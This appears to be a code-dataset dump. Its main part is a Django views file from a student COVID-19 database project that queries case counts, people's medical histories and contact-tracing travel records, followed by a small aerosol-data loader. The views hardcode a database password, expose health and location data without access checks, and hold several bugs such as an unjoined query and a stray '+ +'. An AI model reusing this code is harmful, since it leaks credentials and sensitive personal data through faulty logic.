| 0.733333
|
29e52b7a03150a104462d917259c77ab4b997841
| 34,234
|
py
|
Python
|
travello/views.py
|
KaushikAlwala/COVID-19---a-DBMS-approach
|
66af73c92bd33d134d4353e0e1e34ab165e1529b
|
[
"CC-BY-3.0"
] | null | null | null |
travello/views.py
|
KaushikAlwala/COVID-19---a-DBMS-approach
|
66af73c92bd33d134d4353e0e1e34ab165e1529b
|
[
"CC-BY-3.0"
] | null | null | null |
travello/views.py
|
KaushikAlwala/COVID-19---a-DBMS-approach
|
66af73c92bd33d134d4353e0e1e34ab165e1529b
|
[
"CC-BY-3.0"
] | null | null | null |
from django.shortcuts import render
from .models import Destination
from .models import Daily_cases
from .models import people
from .models import people3
from .models import victims
from .models import Travel_history
import psycopg2
# Create your views here.
def index(request):
return render(request, 'index.html')
def homepage(request):
return render(request, 'index.html')
def doneby(request):
return render(request, 'doneby.html')
def link_1(request):
return render(request, 'link_1.html')
def link_2(request):
return render(request, 'link_2.html')
def link_3(request):
return render(request, 'link_3.html')
def link_4(request):
return render(request, 'link_4.html')
def link_5(request):
return render(request, 'link_5.html')
def link_6(request):
return render(request, 'link_6.html')
def link_7(request):
return render(request, 'link_7.html')
def link_8(request):
return render(request, 'link_8.html')
def link_9(request):
return render(request, 'link_9.html')
def link_10(request):
return render(request, 'link_10.html')
def link_11(request):
return render(request, 'link_11.html')
def link_12(request):
return render(request, 'link_12.html')
def link_13(request):
return render(request, 'link_13.html')
def link_14(request):
return render(request, 'link_14.html')
def link_15(request):
return render(request, 'link_15.html')
def your_options(request):
if (request.POST["option"]=="Cases_in_different_countries"):
return render(request, 'cases.html')
if (request.POST["option"]=="else"):
return render(request, 'Graphs.html')
def cases_results(request):
country_name = request.POST["s"]
date_entered = request.POST["date"]
desired_country=Daily_cases()
conn = psycopg2.connect(database = "COVID19", user = "postgres", password = "cs251", host = "127.0.0.1", port = "5432")
cur = conn.cursor()
cur.execute("SELECT id, date, iso_code, location, new_cases, new_deaths, total_cases, total_deaths from travello_daily_cases where location= %s and date= %s ",(country_name , date_entered))
name = cur.fetchall()
desired_country.id = name[0][0]
desired_country.date = name[0][1]
desired_country.iso_code = name[0][2]
desired_country.location = name[0][3]
desired_country.new_cases = name[0][4]
desired_country.new_deaths = name[0][5]
desired_country.total_cases = name[0][6]
desired_country.total_deaths = name[0][7]
return render(request, 'cases_results.html',{'desired_country':desired_country})
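# graph_options: passes the country picked in the POST form to
# graph_results.html as 'gopt'; options outside the list below fall through
# and return nothing.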
def graph_options(request):
if (request.POST["option"]=="Belgium"):
gopt = "Belgium"
return render(request, 'graph_results.html',{'gopt':gopt})
if (request.POST["option"]=="Brazil"):
gopt = "Brazil"
return render(request, 'graph_results.html',{'gopt':gopt})
if (request.POST["option"]=="Canada"):
gopt = "Canada"
return render(request, 'graph_results.html',{'gopt':gopt})
if (request.POST["option"]=="Chile"):
gopt = "Chile"
return render(request, 'graph_results.html',{'gopt':gopt})
if (request.POST["option"]=="China"):
gopt = "China"
return render(request, 'graph_results.html',{'gopt':gopt})
if (request.POST["option"]=="France"):
gopt = "France"
return render(request, 'graph_results.html',{'gopt':gopt})
if (request.POST["option"]=="Germany"):
gopt = "Germany"
return render(request, 'graph_results.html',{'gopt':gopt})
if (request.POST["option"]=="India"):
gopt = "India"
return render(request, 'graph_results.html',{'gopt':gopt})
if (request.POST["option"]=="Iran"):
gopt = "Iran"
return render(request, 'graph_results.html',{'gopt':gopt})
if (request.POST["option"]=="Italy"):
gopt = "Italy"
return render(request, 'graph_results.html',{'gopt':gopt})
if (request.POST["option"]=="Mexico"):
gopt = "Mexico"
return render(request, 'graph_results.html',{'gopt':gopt})
if (request.POST["option"]=="Pakistan"):
gopt = "Pakistan"
return render(request, 'graph_results.html',{'gopt':gopt})
if (request.POST["option"]=="Peru"):
gopt = "Peru"
return render(request, 'graph_results.html',{'gopt':gopt})
if (request.POST["option"]=="Qatar"):
gopt = "Qatar"
return render(request, 'graph_results.html',{'gopt':gopt})
if (request.POST["option"]=="Russia"):
gopt = "Russia"
return render(request, 'graph_results.html',{'gopt':gopt})
if (request.POST["option"]=="Saudi_Arabia"):
gopt = "Saudi_Arabia"
return render(request, 'graph_results.html',{'gopt':gopt})
if (request.POST["option"]=="Spain"):
gopt = "Spain"
return render(request, 'graph_results.html',{'gopt':gopt})
if (request.POST["option"]=="Turkey"):
gopt = "Turkey"
return render(request, 'graph_results.html',{'gopt':gopt})
if (request.POST["option"]=="UK"):
gopt = "UK"
return render(request, 'graph_results.html',{'gopt':gopt})
if (request.POST["option"]=="USA"):
gopt = "USA"
return render(request, 'graph_results.html',{'gopt':gopt})
def MDU_options(request):
if (request.POST["option"]=="Travel_history"):
return render(request, 'Travel_history.html')
if (request.POST["option"]=="PD"):
return render(request, 'PD.html')
if (request.POST["option"]=="QC"):
return render(request, 'Quarantine_centres.html')
if (request.POST["option"]=="VC"):
return render(request, 'VC.html')
if (request.POST["option"]=="Vulnerability"):
return render(request, 'Vulnerability.html')
if (request.POST["option"]=="I"):
return render(request, 'I.html')
def I_results(request):
victim = request.POST["v"]
center = request.POST["c"]
date = request.POST["a"]
v = victims.objects.all()
flag =0
for q in v:
if q.victim_id == victim:
flag = 1
return render(request, 'A.html')
count = 0
for q in v:
count = count + 1
x = int(count+1)
conn = psycopg2.connect(database = "COVID19", user = "postgres", password = "cs251", host = "127.0.0.1", port = "5432")
cur = conn.cursor()
cur.execute("INSERT INTO public.travello_victims(id, victim_id, centre_id, admit_date) VALUES (%s, %s, %s, %s) ",(x,victim,center,date,))
return render(request, 'I_results.html')
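# PD_results: looks up a person by national id, joins in their medical
# history flags, and renders a summary of the conditions marked "Positive".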
def PD_results(request):
person = request.POST["x"]
desired_person = people3()
conn = psycopg2.connect(database = "COVID19", user = "postgres", password = "cs251", host = "127.0.0.1", port = "5432")
cur = conn.cursor()
cur.execute("SELECT travello_people3.id, national_id, name, phone_number, age, address, Ischemic_heart_disease, Stroke, Bronchitis, HIV_AIDS, COPD, Diabetes_mellitus, Kidney_Disease FROM travello_people3, travello_medical_history WHERE national_id= %s",(person,))
name = cur.fetchall()
desired_person.id = int(name[0][1])
desired_person.national_id = name[0][1]
desired_person.name = str(name[0][2])
desired_person.phone_number = str(name[0][3])
desired_person.age = str(name[0][4])
desired_person.address = str(name[0][5])
st = "This person is suffering from : "
di = ["Ischemic Heart disease", "Stroke" , "Bronchitis" , "HIV-AIDS" , "COPD", "Diabetes Mellitus" , "Kidney Disease"]
for i in [6, 7, 8, 9, 10, 11, 12]:
if name[0][i] == "Positive":
st = st + str(di[i-6]) + " , "
desired_person.national_id = st
return render(request, 'PD_results.html',{'desired_person':desired_person})
def QC_results(request):
centre = request.POST["s"]
conn = psycopg2.connect(database = "COVID19", user = "postgres", password = "cs251", host = "127.0.0.1", port = "5432")
cur = conn.cursor()
cur.execute("SELECT centre_name, address FROM travello_quarantine_centres WHERE centre_id= %s",(centre,))
name = cur.fetchall()
stri = "Centre Name :" + str(name[0][0]) +" , " + "Address : " + str(name[0][1]) + ". The ID's of the victims in this centre are : "
conn = psycopg2.connect(database = "COVID19", user = "postgres", password = "cs251", host = "127.0.0.1", port = "5432")
cur = conn.cursor()
cur.execute("SELECT victim_id FROM travello_victims WHERE centre_id= %s",(centre,))
y = cur.fetchall()
for i in range(0,len(y)-1):
stri = stri + " , " + str(y[i][0])
return render(request, 'QC_results.html',{'stri':stri})
def VC_results(request):
person = request.POST["s"]
y = victims.objects.all()
flag = 0
for z in y:
if z.victim_id == person:
d=z
flag = 1
if(flag==1):
stri = "This person is infected with COVID19 on " + str(d.admit_date) + " . He is currently at the Quarantine centre with ID : " + str(d.centre_id)
else:
stri = "This person is not infected with COVID19"
return render(request, 'QC_results.html',{'stri':stri})
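# TH_results: for the selected April date, reports where the person was and
# lists the ids of other people recorded at the same place on that date; each
# date branch repeats the same two queries against travello_travel_history.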
def TH_results(request):
person = request.POST["s"]
date = request.POST["option"]
conn = psycopg2.connect(database = "COVID19", user = "postgres", password = "cs251", host = "127.0.0.1", port = "5432")
cur = conn.cursor()
cur.execute("SELECT april_16 FROM travello_travel_history WHERE person_id= %s",(person,))
name = cur.fetchall()
if date == "april_16":
conn = psycopg2.connect(database = "COVID19", user = "postgres", password = "cs251", host = "127.0.0.1", port = "5432")
cur = conn.cursor()
cur.execute("SELECT april_16 FROM travello_travel_history WHERE person_id= %s",(person,))
name = cur.fetchall()
stri = "This perosn was at " + str(name[0][0]) + ". The ID's of other people who were in the same place on the same date are "
place = str(name[0][0])
conn = psycopg2.connect(database = "COVID19", user = "postgres", password = "cs251", host = "127.0.0.1", port = "5432")
cur = conn.cursor()
cur.execute("SELECT person_id FROM travello_travel_history WHERE april_16= %s",(place,))
y=cur.fetchall()
for i in range(2,len(y)):
stri = stri + str(y[i][0]) + " , "
if date == "april_17":
conn = psycopg2.connect(database = "COVID19", user = "postgres", password = "cs251", host = "127.0.0.1", port = "5432")
cur = conn.cursor()
cur.execute("SELECT april_17 FROM travello_travel_history WHERE person_id= %s",(person,))
name = cur.fetchall()
stri = "This perosn was at " + str(name[0][0]) + ". The ID's of other people who were in the same place on the same date are "
place = str(name[0][0])
conn = psycopg2.connect(database = "COVID19", user = "postgres", password = "cs251", host = "127.0.0.1", port = "5432")
cur = conn.cursor()
cur.execute("SELECT person_id FROM travello_travel_history WHERE april_17= %s",(place,))
y=cur.fetchall()
for i in range(2,len(y)):
stri = stri + str(y[i][0]) + " , "
if date == "april_18":
conn = psycopg2.connect(database = "COVID19", user = "postgres", password = "cs251", host = "127.0.0.1", port = "5432")
cur = conn.cursor()
cur.execute("SELECT april_18 FROM travello_travel_history WHERE person_id= %s",(person,))
name = cur.fetchall()
stri = "This perosn was at " + str(name[0][0]) + ". The ID's of other people who were in the same place on the same date are "
place = str(name[0][0])
conn = psycopg2.connect(database = "COVID19", user = "postgres", password = "cs251", host = "127.0.0.1", port = "5432")
cur = conn.cursor()
cur.execute("SELECT person_id FROM travello_travel_history WHERE april_18= %s",(place,))
y=cur.fetchall()
for i in range(2,len(y)):
stri = stri + str(y[i][0]) + " , "
if date == "april_19":
conn = psycopg2.connect(database = "COVID19", user = "postgres", password = "cs251", host = "127.0.0.1", port = "5432")
cur = conn.cursor()
cur.execute("SELECT april_19 FROM travello_travel_history WHERE person_id= %s",(person,))
name = cur.fetchall()
stri = "This perosn was at " + str(name[0][0]) + ". The ID's of other people who were in the same place on the same date are "
place = str(name[0][0])
conn = psycopg2.connect(database = "COVID19", user = "postgres", password = "cs251", host = "127.0.0.1", port = "5432")
cur = conn.cursor()
cur.execute("SELECT person_id FROM travello_travel_history WHERE april_19= %s",(place,))
y=cur.fetchall()
for i in range(2,len(y)-1):
stri = stri + str(y[i][0]) + " , "
if date == "april_20":
conn = psycopg2.connect(database = "COVID19", user = "postgres", password = "cs251", host = "127.0.0.1", port = "5432")
cur = conn.cursor()
cur.execute("SELECT april_20 FROM travello_travel_history WHERE person_id= %s",(person,))
name = cur.fetchall()
stri = "This perosn was at " + str(name[0][0]) + ". The ID's of other people who were in the same place on the same date are "
place = str(name[0][0])
conn = psycopg2.connect(database = "COVID19", user = "postgres", password = "cs251", host = "127.0.0.1", port = "5432")
cur = conn.cursor()
cur.execute("SELECT person_id FROM travello_travel_history WHERE april_20= %s",(place,))
y=cur.fetchall()
for i in range(2,len(y)-1):
stri = stri + str(y[i][0]) + " , "
if date == "april_21":
conn = psycopg2.connect(database = "COVID19", user = "postgres", password = "cs251", host = "127.0.0.1", port = "5432")
cur = conn.cursor()
cur.execute("SELECT april_21 FROM travello_travel_history WHERE person_id= %s",(person,))
name = cur.fetchall()
stri = "This perosn was at " + str(name[0][0]) + ". The ID's of other people who were in the same place on the same date are "
place = str(name[0][0])
conn = psycopg2.connect(database = "COVID19", user = "postgres", password = "cs251", host = "127.0.0.1", port = "5432")
cur = conn.cursor()
cur.execute("SELECT person_id FROM travello_travel_history WHERE april_21= %s",(place,))
y=cur.fetchall()
for i in range(2,len(y)-1):
stri = stri + str(y[i][0]) + " , "
if date == "april_22":
conn = psycopg2.connect(database = "COVID19", user = "postgres", password = "cs251", host = "127.0.0.1", port = "5432")
cur = conn.cursor()
cur.execute("SELECT april_22 FROM travello_travel_history WHERE person_id= %s",(person,))
name = cur.fetchall()
stri = "This perosn was at " + str(name[0][0]) + ". The ID's of other people who were in the same place on the same date are "
place = str(name[0][0])
conn = psycopg2.connect(database = "COVID19", user = "postgres", password = "cs251", host = "127.0.0.1", port = "5432")
cur = conn.cursor()
cur.execute("SELECT person_id FROM travello_travel_history WHERE april_22= %s",(place,))
y=cur.fetchall()
for i in range(2,len(y)-1):
stri = stri + str(y[i][0]) + " , "
if date == "april_23":
conn = psycopg2.connect(database = "COVID19", user = "postgres", password = "cs251", host = "127.0.0.1", port = "5432")
cur = conn.cursor()
cur.execute("SELECT april_23 FROM travello_travel_history WHERE person_id= %s",(person,))
name = cur.fetchall()
stri = "This perosn was at " + str(name[0][0]) + ". The ID's of other people who were in the same place on the same date are "
place = str(name[0][0])
conn = psycopg2.connect(database = "COVID19", user = "postgres", password = "cs251", host = "127.0.0.1", port = "5432")
cur = conn.cursor()
cur.execute("SELECT person_id FROM travello_travel_history WHERE april_23= %s",(place,))
y=cur.fetchall()
for i in range(2,len(y)):
stri = stri + str(y[i][0]) + " , "
if date == "april_24":
conn = psycopg2.connect(database = "COVID19", user = "postgres", password = "cs251", host = "127.0.0.1", port = "5432")
cur = conn.cursor()
cur.execute("SELECT april_24 FROM travello_travel_history WHERE person_id= %s",(person,))
name = cur.fetchall()
stri = "This perosn was at " + str(name[0][0]) + ". The ID's of other people who were in the same place on the same date are "
place = str(name[0][0])
conn = psycopg2.connect(database = "COVID19", user = "postgres", password = "cs251", host = "127.0.0.1", port = "5432")
cur = conn.cursor()
cur.execute("SELECT person_id FROM travello_travel_history WHERE april_24= %s",(place,))
y=cur.fetchall()
for i in range(2,len(y)):
stri = stri + str(y[i][0]) + " , "
if date == "april_25":
conn = psycopg2.connect(database = "COVID19", user = "postgres", password = "cs251", host = "127.0.0.1", port = "5432")
cur = conn.cursor()
cur.execute("SELECT april_25 FROM travello_travel_history WHERE person_id= %s",(person,))
name = cur.fetchall()
stri = "This perosn was at " + str(name[0][0]) + ". The ID's of other people who were in the same place on the same date are "
place = str(name[0][0])
conn = psycopg2.connect(database = "COVID19", user = "postgres", password = "cs251", host = "127.0.0.1", port = "5432")
cur = conn.cursor()
cur.execute("SELECT person_id FROM travello_travel_history WHERE april_25= %s",(place,))
y=cur.fetchall()
for i in range(2,len(y)):
stri = stri + str(y[i][0]) + " , "
if date == "april_26":
conn = psycopg2.connect(database = "COVID19", user = "postgres", password = "cs251", host = "127.0.0.1", port = "5432")
cur = conn.cursor()
cur.execute("SELECT april_26 FROM travello_travel_history WHERE person_id= %s",(person,))
name = cur.fetchall()
stri = "This perosn was at " + str(name[0][0]) + ". The ID's of other people who were in the same place on the same date are "
place = str(name[0][0])
conn = psycopg2.connect(database = "COVID19", user = "postgres", password = "cs251", host = "127.0.0.1", port = "5432")
cur = conn.cursor()
cur.execute("SELECT person_id FROM travello_travel_history WHERE april_26= %s",(place,))
y=cur.fetchall()
for i in range(2,len(y)):
stri = stri + str(y[i][0]) + " , "
if date == "april_27":
conn = psycopg2.connect(database = "COVID19", user = "postgres", password = "cs251", host = "127.0.0.1", port = "5432")
cur = conn.cursor()
cur.execute("SELECT april_27 FROM travello_travel_history WHERE person_id= %s",(person,))
name = cur.fetchall()
stri = "This perosn was at " + str(name[0][0]) + ". The ID's of other people who were in the same place on the same date are "
place = str(name[0][0])
conn = psycopg2.connect(database = "COVID19", user = "postgres", password = "cs251", host = "127.0.0.1", port = "5432")
cur = conn.cursor()
cur.execute("SELECT person_id FROM travello_travel_history WHERE april_27= %s",(place,))
y=cur.fetchall()
for i in range(2,len(y)):
stri = stri + " , " + str(y[i][0])
if date == "april_28":
conn = psycopg2.connect(database = "COVID19", user = "postgres", password = "cs251", host = "127.0.0.1", port = "5432")
cur = conn.cursor()
cur.execute("SELECT april_28 FROM travello_travel_history WHERE person_id= %s",(person,))
name = cur.fetchall()
stri = "This perosn was at " + str(name[0][0]) + ". The ID's of other people who were in the same place on the same date are "
place = str(name[0][0])
conn = psycopg2.connect(database = "COVID19", user = "postgres", password = "cs251", host = "127.0.0.1", port = "5432")
cur = conn.cursor()
cur.execute("SELECT person_id FROM travello_travel_history WHERE april_28= %s",(place,))
y=cur.fetchall()
for i in range(2,len(y)):
stri = stri + str(y[i][0])+ " , "
if date == "april_29":
conn = psycopg2.connect(database = "COVID19", user = "postgres", password = "cs251", host = "127.0.0.1", port = "5432")
cur = conn.cursor()
cur.execute("SELECT april_29 FROM travello_travel_history WHERE person_id= %s",(person,))
name = cur.fetchall()
stri = "This perosn was at " + str(name[0][0]) + ". The ID's of other people who were in the same place on the same date are "
place = str(name[0][0])
conn = psycopg2.connect(database = "COVID19", user = "postgres", password = "cs251", host = "127.0.0.1", port = "5432")
cur = conn.cursor()
cur.execute("SELECT person_id FROM travello_travel_history WHERE april_29= %s",(place,))
y=cur.fetchall()
for i in range(2,len(y)):
stri = stri + str(y[i][0]) + " , "
if date == "april_30":
conn = psycopg2.connect(database = "COVID19", user = "postgres", password = "cs251", host = "127.0.0.1", port = "5432")
cur = conn.cursor()
cur.execute("SELECT april_20 FROM travello_travel_history WHERE person_id= %s",(person,))
name = cur.fetchall()
stri = "This perosn was at " + str(name[0][0]) + ". The ID's of other people who were in the same place on the same date are "
place = str(name[0][0])
conn = psycopg2.connect(database = "COVID19", user = "postgres", password = "cs251", host = "127.0.0.1", port = "5432")
cur = conn.cursor()
cur.execute("SELECT person_id FROM travello_travel_history WHERE april_30= %s",(place,))
y=cur.fetchall()
for i in range(2,len(y)):
stri = stri + + str(y[i][0]) + " , "
return render(request, 'TH_results.html',{'stri':stri})
def V_results(request):
person = request.POST["s"]
v = victims.objects.all()
th = Travel_history()
flag=0
for g in v:
if person in g.victim_id:
flag = 1
return render(request, 'AaV.html',)
if flag==0:
conn = psycopg2.connect(database = "COVID19", user = "postgres", password = "cs251", host = "127.0.0.1", port = "5432")
cur = conn.cursor()
cur.execute("SELECT april_16, april_17, april_18, april_19, april_20, april_21, april_22, april_23, april_24, april_25, april_26, april_27, april_28, april_29, april_30 from travello_travel_history where person_id = %s ",(person,))
name = cur.fetchall()
A16 = name[0][0]
A17 = name[0][1]
A18 = name[0][2]
A19 = name[0][3]
A20 = name[0][4]
A21 = name[0][5]
A22 = name[0][6]
A23 = name[0][7]
A24 = name[0][8]
A25 = name[0][9]
A26 = name[0][10]
A27 = name[0][11]
A28 = name[0][12]
A29 = name[0][13]
A30 = name[0][14]
dates = ["april_16","april_17","april_18","april_19","april_20","april_21","april_22","april_23","april_24","april_25","april_26","april_27","april_28","april_29","april_30"]
conn = psycopg2.connect(database = "COVID19", user = "postgres", password = "cs251", host = "127.0.0.1", port = "5432")
cur = conn.cursor()
cur.execute("SELECT travello_travel_history2.person_id FROM travello_travel_history2, travello_victims WHERE travello_travel_history2.person_id = travello_victims.victim_id and travello_travel_history2.april_16 = %s",(A16,))
y16 = cur.fetchall()
str16 = "On this day this person was at " + str(A16) + " The now victims who had visited this place are : "
for i in range(0,len(y16)-1):
str16 = str16 + str(y16[i][0]) + " , "
th.april_16 = str16
conn = psycopg2.connect(database = "COVID19", user = "postgres", password = "cs251", host = "127.0.0.1", port = "5432")
cur = conn.cursor()
cur.execute("SELECT travello_travel_history2.person_id FROM travello_travel_history2, travello_victims WHERE travello_travel_history2.person_id = travello_victims.victim_id and travello_travel_history2.april_17 = %s",(A17,))
y17 = cur.fetchall()
str17 = "On this day this person was at " + str(A17) + " The now victims who had visited this place are : "
for i in range(0,len(y17)-1):
str17 = str17 + str(y17[i][0]) + " , "
th.april_17 = str17
conn = psycopg2.connect(database = "COVID19", user = "postgres", password = "cs251", host = "127.0.0.1", port = "5432")
cur = conn.cursor()
cur.execute("SELECT travello_travel_history2.person_id FROM travello_travel_history2, travello_victims WHERE travello_travel_history2.person_id = travello_victims.victim_id and travello_travel_history2.april_18 = %s",(A18,))
y18 = cur.fetchall()
str18 = "On this day this person was at " + str(A18) + " The now victims who had visited this place are : "
for i in range(0,len(y18)-1):
str18 = str18 + str(y18[i][0]) + " , "
th.april_18 = str18
conn = psycopg2.connect(database = "COVID19", user = "postgres", password = "cs251", host = "127.0.0.1", port = "5432")
cur = conn.cursor()
cur.execute("SELECT travello_travel_history2.person_id FROM travello_travel_history2, travello_victims WHERE travello_travel_history2.person_id = travello_victims.victim_id and travello_travel_history2.april_19 = %s",(A19,))
y19 = cur.fetchall()
str19 = "On this day this person was at " + str(A19) + " The now victims who had visited this place are : "
for i in range(0,len(y19)-1):
str19 = str19 + str(y19[i][0]) + " , "
th.april_19 = str19
conn = psycopg2.connect(database = "COVID19", user = "postgres", password = "cs251", host = "127.0.0.1", port = "5432")
cur = conn.cursor()
cur.execute("SELECT travello_travel_history2.person_id FROM travello_travel_history2, travello_victims WHERE travello_travel_history2.person_id = travello_victims.victim_id and travello_travel_history2.april_20 = %s",(A20,))
y20 = cur.fetchall()
str20 = "On this day this person was at " + str(20) + " The now victims who had visited this place are : "
for i in range(0,len(y20)-1):
str20 = str20 + str(y20[i][0]) + " , "
th.april_20 = str20
conn = psycopg2.connect(database = "COVID19", user = "postgres", password = "cs251", host = "127.0.0.1", port = "5432")
cur = conn.cursor()
cur.execute("SELECT travello_travel_history2.person_id FROM travello_travel_history2, travello_victims WHERE travello_travel_history2.person_id = travello_victims.victim_id and travello_travel_history2.april_21 = %s",(A21,))
y21 = cur.fetchall()
str21 = "On this day this person was at " + str(A21) + " The now victims who had visited this place are : "
for i in range(0,len(y21)-1):
str21 = str21 + str(y21[i][0]) + " , "
th.april_21 = str21
conn = psycopg2.connect(database = "COVID19", user = "postgres", password = "cs251", host = "127.0.0.1", port = "5432")
cur = conn.cursor()
cur.execute("SELECT travello_travel_history2.person_id FROM travello_travel_history2, travello_victims WHERE travello_travel_history2.person_id = travello_victims.victim_id and travello_travel_history2.april_22 = %s",(A22,))
y22 = cur.fetchall()
str22 = "On this day this person was at " + str(A22) + " The now victims who had visited this place are : "
for i in range(0,len(y22)-1):
str22 = str22 + str(y22[i][0]) + " , "
th.april_22 = str22
conn = psycopg2.connect(database = "COVID19", user = "postgres", password = "cs251", host = "127.0.0.1", port = "5432")
cur = conn.cursor()
cur.execute("SELECT travello_travel_history2.person_id FROM travello_travel_history2, travello_victims WHERE travello_travel_history2.person_id = travello_victims.victim_id and travello_travel_history2.april_23 = %s",(A23,))
y23 = cur.fetchall()
str23 = "On this day this person was at " + str(A23) + " The now victims who had visited this place are : "
for i in range(0,len(y23)-1):
str23 = str23 + str(y23[i][0]) + " , "
th.april_23 = str23
conn = psycopg2.connect(database = "COVID19", user = "postgres", password = "cs251", host = "127.0.0.1", port = "5432")
cur = conn.cursor()
cur.execute("SELECT travello_travel_history2.person_id FROM travello_travel_history2, travello_victims WHERE travello_travel_history2.person_id = travello_victims.victim_id and travello_travel_history2.april_24 = %s",(A24,))
y24 = cur.fetchall()
str24 = "On this day this person was at " + str(A24) + " The now victims who had visited this place are : "
for i in range(0,len(y24)-1):
str24 = str24 + str(y24[i][0]) + " , "
th.april_24 = str24
conn = psycopg2.connect(database = "COVID19", user = "postgres", password = "cs251", host = "127.0.0.1", port = "5432")
cur = conn.cursor()
cur.execute("SELECT travello_travel_history2.person_id FROM travello_travel_history2, travello_victims WHERE travello_travel_history2.person_id = travello_victims.victim_id and travello_travel_history2.april_25 = %s",(A25,))
y25 = cur.fetchall()
str25 = "On this day this person was at " + str(A25) + " The now victims who had visited this place are : "
for i in range(0,len(y25)-1):
str25 = str25 + str(y25[i][0]) + " , "
th.april_25 = str25
conn = psycopg2.connect(database = "COVID19", user = "postgres", password = "cs251", host = "127.0.0.1", port = "5432")
cur = conn.cursor()
cur.execute("SELECT travello_travel_history2.person_id FROM travello_travel_history2, travello_victims WHERE travello_travel_history2.person_id = travello_victims.victim_id and travello_travel_history2.april_26 = %s",(A26,))
y26 = cur.fetchall()
str26 = "On this day this person was at " + str(A26) + " The now victims who had visited this place are : "
for i in range(0,len(y26)-1):
str26 = str26 + str(y26[i][0]) + " , "
th.april_26 = str26
conn = psycopg2.connect(database = "COVID19", user = "postgres", password = "cs251", host = "127.0.0.1", port = "5432")
cur = conn.cursor()
cur.execute("SELECT travello_travel_history2.person_id FROM travello_travel_history2, travello_victims WHERE travello_travel_history2.person_id = travello_victims.victim_id and travello_travel_history2.april_27 = %s",(A27,))
y27 = cur.fetchall()
str27 = "On this day this person was at " + str(A27) + " The now victims who had visited this place are : "
for i in range(0,len(y27)-1):
str27 = str27 + str(y27[i][0]) + " , "
th.april_27 = str27
conn = psycopg2.connect(database = "COVID19", user = "postgres", password = "cs251", host = "127.0.0.1", port = "5432")
cur = conn.cursor()
cur.execute("SELECT travello_travel_history2.person_id FROM travello_travel_history2, travello_victims WHERE travello_travel_history2.person_id = travello_victims.victim_id and travello_travel_history2.april_28 = %s",(A28,))
y28 = cur.fetchall()
str28 = "On this day this person was at " + str(A28) + " The now victims who had visited this place are : "
for i in range(0,len(y28)-1):
str28 = str28 + str(y28[i][0]) + " , "
th.april_28 = str28
conn = psycopg2.connect(database = "COVID19", user = "postgres", password = "cs251", host = "127.0.0.1", port = "5432")
cur = conn.cursor()
cur.execute("SELECT travello_travel_history2.person_id FROM travello_travel_history2, travello_victims WHERE travello_travel_history2.person_id = travello_victims.victim_id and travello_travel_history2.april_29 = %s",(A29,))
y29 = cur.fetchall()
str29 = "On this day this person was at " + str(A29) + " The now victims who had visited this place are : "
for i in range(0,len(y29)-1):
str29 = str29 + str(y29[i][0]) + " , "
th.april_29 = str29
conn = psycopg2.connect(database = "COVID19", user = "postgres", password = "cs251", host = "127.0.0.1", port = "5432")
cur = conn.cursor()
cur.execute("SELECT travello_travel_history2.person_id FROM travello_travel_history2, travello_victims WHERE travello_travel_history2.person_id = travello_victims.victim_id and travello_travel_history2.april_30 = %s",(A30,))
y30 = cur.fetchall()
str30 = "On this day this person was at " + str(A30) + " The now victims who had visited this place are : "
for i in range(0,len(y30)-1):
str30 = str30 + str(y30[i][0]) + " , "
th.april_30 = str30
th.person_id = str(len(y16) + len(y17) + len(y18) + len(y19) + len(y20) + len(y21) + len(y22) +len(y23) + len(y24) + len(y25) + len(y26) + len(y27) + len(y28) + len(y29) + len(y30))
return render(request, 'V_results.html',{'th': th})
| 49.686502
| 269
| 0.60361
|
d616e41be0ea8901b26b2beb53e41bbb12ebe211
| 2,314
|
py
|
Python
|
oas_erf/util/eusaar_data/histc_vars.py
|
sarambl/OAS-ERF
|
7510c21a630748eda2961608166227ad77935a67
|
[
"MIT"
] | null | null | null |
oas_erf/util/eusaar_data/histc_vars.py
|
sarambl/OAS-ERF
|
7510c21a630748eda2961608166227ad77935a67
|
[
"MIT"
] | null | null | null |
oas_erf/util/eusaar_data/histc_vars.py
|
sarambl/OAS-ERF
|
7510c21a630748eda2961608166227ad77935a67
|
[
"MIT"
] | null | null | null |
import os
import numpy as np
import pandas as pd
import xarray as xr
from oas_erf.constants import path_eusaar_data
from oas_erf.util.eusaar_data import time_h, station_codes, long_name_var_dic, standard_varlist_histc, \
savepath_histc_vars
from oas_erf.util.eusaar_data.flags import load_gd
from oas_erf.util.practical_functions import make_folders
def load_data_timeseries(station, var):
"""
Load data timeseries for variable
:param station:
:param var:
:return: pandas.Series
"""
dr = path_eusaar_data + '/HISTC/'
fp = dr + station + '_' + var + '.dat'
arr = np.loadtxt(fp)
return pd.Series(arr, index=time_h, name=station)
# %%
def load_var_as_dtframe(var):
"""
Load variable for all stations as dataframe
:param var:
:return:
"""
df_o = pd.DataFrame()
for station in station_codes:
s = load_data_timeseries(station, var)
s_gd = load_gd(station)
df_o[station] = s.where(s_gd)
return df_o
def load_var_as_xarray(var):
"""Loads variable list from HISTC and creates xarray dataarray
with dims station and time
:param var:
:return: xr.DataArray
"""
attrs = dict(
units='cm-3',
)
if var in long_name_var_dic:
attrs['long_name'] = long_name_var_dic[var]
attrs['fancy_name'] = long_name_var_dic[var]
df = load_var_as_dtframe(var)
da = df.to_xarray().to_array(dim='station', name=var)
for att in attrs:
da.attrs[att] = attrs[att]
return da
def load_vars_as_xarray(varl=None):
"""
Loads variable list from HISTC and creates xarray dataset
with dims station and time
:param varl: list of variables
:return:
"""
if varl is None:
varl = standard_varlist_histc
xa_l = []
for var in varl:
xa_l.append(load_var_as_xarray(var))
return xr.merge(xa_l)
def load_and_save_vars_as_xarray():
ds = load_vars_as_xarray()
make_folders(savepath_histc_vars)
ds.to_netcdf(savepath_histc_vars)
return ds
def get_histc_vars_xr():
"""
get histc variables (N30, N50, N100, N250) for all years
:return:
"""
if os.path.isfile(savepath_histc_vars):
return xr.load_dataset(savepath_histc_vars)
else:
return load_and_save_vars_as_xarray()
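# Illustrative usage sketch (not part of the original module): assumes the
# EUSAAR data paths configured in oas_erf.constants point at existing files.
if __name__ == "__main__":
    histc_ds = get_histc_vars_xr()
    print(histc_ds)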
| 24.617021
| 104
| 0.672861
|
e68642a86744ff463f3b6765ac7a35d2f7eb5afe
| 44,147
|
py
|
Python
|
tools/management/commands/build_bias_data.py
|
AlibekMamyrbekov/protwis
|
b3d477b1982623618d995ab5c7f47c918a70238b
|
[
"Apache-2.0"
] | 3
|
2019-07-29T11:49:38.000Z
|
2021-03-03T10:59:29.000Z
|
tools/management/commands/build_bias_data.py
|
AlibekMamyrbekov/protwis
|
b3d477b1982623618d995ab5c7f47c918a70238b
|
[
"Apache-2.0"
] | 1
|
2021-05-12T14:21:53.000Z
|
2021-05-12T14:21:53.000Z
|
